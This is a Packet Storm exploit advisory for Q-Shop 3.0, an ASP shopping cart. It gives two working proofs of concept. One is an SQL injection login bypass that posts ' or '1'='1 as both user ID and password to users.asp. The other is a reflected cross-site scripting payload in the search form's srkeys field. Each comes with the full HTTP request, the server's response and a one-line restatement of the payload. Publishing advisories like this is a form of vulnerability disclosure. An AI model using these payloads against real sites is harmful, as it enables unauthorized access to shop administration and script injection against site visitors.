what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

qshop-sqlxss.txt

qshop-sqlxss.txt
Posted Nov 18, 2008
Authored by Bl@ckbe@rd

Q-Shop version 3.0 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | c2a91274a1ca83c31b7cebe41e70c8bb54787a1a665d06c111fd541f5e40f1fc

qshop-sqlxss.txt

Change Mirror Download
000000  00000     0000    0000  000  00 000000  0000000   0000  000000  00000
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 00 0 0 0 0 0 0 0 0 00 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
00000 0 0 0 0 0 0 0 0 00000 0000 0 0 0 0 00000 0 0
0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 000 0 0 0 0 0 0 0 000 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
000000 0000000 000 0000 000 00 000000 0000000 000 000 00 00000



[+] Script : Q-Shop v 3.0 (Maybe prior versions also)

[+] Exploit Type : Multiple Exploits (XSS + Remote Login Bypass)

[+] Script's Homepage : http://quadcomm.com/qshop/

[+] Script's Description : ('Q-Shop is a fully featured shopping system including: full catalog browsing system, Shopping cart, User purchase history generation, web based catalog administration, web based order administration, web based user management and many more features. Supports MS Access and MS SQL Server. Full ASP source code included.')

[+] Script's Price : $249 USD


--//--> Exploit :

1) Remote login bypass :

http://[website]/[script]/users.asp

PoC :

Host: www.[website].cc
User-Agent: Blackness Lynx/1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.[website].cc/[script]/users.asp
Cookie: ASPSESSIONIDACADTDQS=KPALCBJDEKLJOPFDAGIFIFBJ
Content-Type: application/x-www-form-urlencoded
Content-Length: 66

UserID=%27+or+%271%27%3D%271&Pwd=%27+or+%271%27%3D%271&Login=[ok]

HTTP/1.x 200 OK
Cache-Control: private
Date: Sat, 15 Nov 2008 19:58:02 GMT
Content-Length: 31227
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

In simple words :


userID = ' or '1'='1

Pwd = ' or '1'='1


2) Remote XSS exploit :



PoC :

http://[website]/[script]/search.asp

POST /q-shop/search.asp HTTP/1.1
Host: [website]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.4) Gecko/2008102920 Firefox 3.0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[website]/[script]/search.asp
Cookie: ASPSESSIONIDACADTDQS=KPALCBJDEKLJOPFDAGIFIFBJ
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
srkeys=%3Cscript%3Ealert%28%27Bl%40ckbe%40rD+is+not+yet+%21%27%29%3C%2Fscript%3E&Criteria=OR&CATS=ALL&x=8&y=18&MinPrice=&MaxPrice=

HTTP/1.x 200 OK
Cache-Control: private
Date: Sat, 15 Nov 2008 20:08:01 GMT
Content-Length: 66513
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET


In simple words :

http://[website]/[script]/search.asp

POST data : srkeys=<script>alert('Bl@ckbe@rD is not dead yet')</script>


[Peace xD ]


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close